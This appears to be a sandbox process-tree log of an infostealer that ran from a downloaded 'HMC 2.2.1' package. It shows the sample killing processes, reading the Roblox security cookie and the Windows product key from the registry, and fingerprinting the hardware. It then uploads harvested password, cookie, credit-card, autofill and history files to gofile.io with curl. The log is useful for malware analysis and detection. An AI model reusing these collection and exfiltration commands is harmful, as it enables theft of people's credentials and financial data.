C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"5⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5704 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3304fzdw\3304fzdw.cmdline"7⤵PID:4276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA18.tmp" "c:\Users\Admin\AppData\Local\Temp\3304fzdw\CSC825DE7F81686453296F1EA4D556419F.TMP"8⤵PID:5648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3856
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2636
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5536
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2272
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5556
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5464
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3664"5⤵PID:6004
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36646⤵
- Kills process with taskkill
PID:920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2256"5⤵PID:4512
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 22566⤵
- Kills process with taskkill
PID:5724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:5372
-
C:\Windows\system32\getmac.exegetmac6⤵PID:1128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1184"5⤵PID:5600
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 11846⤵
- Kills process with taskkill
PID:4824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2344"5⤵PID:2744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5484
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 23446⤵
- Kills process with taskkill
PID:6044 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4268"5⤵PID:5184
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42686⤵
- Kills process with taskkill
PID:5736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"5⤵PID:5896
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19566⤵
- Kills process with taskkill
PID:5040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3560"5⤵PID:1428
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 35606⤵
- Kills process with taskkill
PID:5584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"5⤵PID:4624
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4668
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28726⤵
- Kills process with taskkill
PID:2284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4720"5⤵PID:2632
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47206⤵
- Kills process with taskkill
PID:6096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4496"5⤵PID:3440
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 44966⤵
- Kills process with taskkill
PID:5264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2704"5⤵PID:5848
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4960
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27046⤵
- Kills process with taskkill
PID:4120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5284"5⤵PID:2912
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 52846⤵
- Kills process with taskkill
PID:3272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:6044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45802\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\34h7w.zip" *"5⤵PID:5356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\_MEI45802\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI45802\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\34h7w.zip" *6⤵
- Executes dropped EXE
PID:5696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:4080
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:2680
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:4832
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:4880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5952
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:5820
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:5188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:3108
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:1728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:3552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4468 -
C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exe"x64\runtime.exe"3⤵
- Executes dropped EXE
PID:1900 -
C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exe"x64\runtime.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:3124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:5116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5856
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5588
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic bios get smbiosbiosversion"5⤵PID:3472
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic MemoryChip get /format:list | find /i "Speed""5⤵PID:2236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1008
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list6⤵PID:5656
-
C:\Windows\system32\find.exefind /i "Speed"6⤵PID:5524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:6040
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:5484 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:4668
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:4624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4276
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /fo csv"5⤵PID:4748
-
C:\Windows\system32\tasklist.exetasklist /fo csv6⤵
- Enumerates processes with tasklist
PID:5532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic MemoryChip get /format:list | find /i "Speed""5⤵PID:5732
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list6⤵PID:5648
-
C:\Windows\system32\find.exefind /i "Speed"6⤵PID:2656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:1756
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:2824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:4336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:3148
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:4724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5516
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:780
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:4168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:1196
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:1904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:4984
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:4808
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:3668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:5976
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:5944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5596
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:6056
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:5424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:2352
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:5372
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5676
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
PID:1396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"5⤵PID:2696
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile6⤵PID:2228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"5⤵PID:4524
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile6⤵PID:3108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"5⤵PID:1264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4724
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile6⤵PID:5292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"5⤵PID:5480
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile6⤵PID:5212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"5⤵PID:5660
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile6⤵PID:5776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"5⤵PID:3280
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile6⤵PID:5272
-
C:\Users\Admin\Downloads\HMC 2.2.1\errorlog.exe"errorlog.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/z5vMmkQ8pj4⤵PID:4056
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa797e46f8,0x7ffa797e4708,0x7ffa797e47185⤵PID:2704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa817946f8,0x7ffa81794708,0x7ffa817947182⤵PID:1580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:3736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:82⤵PID:4012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:12⤵PID:5356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:12⤵PID:5732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:5124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:2424
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵PID:1408
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5260 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:12⤵PID:5748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:5424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵PID:848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:12⤵PID:1272
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:12⤵PID:5688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:12⤵PID:2976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:12⤵PID:1648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:1564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵PID:2300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:5100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵PID:4804
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3196
-
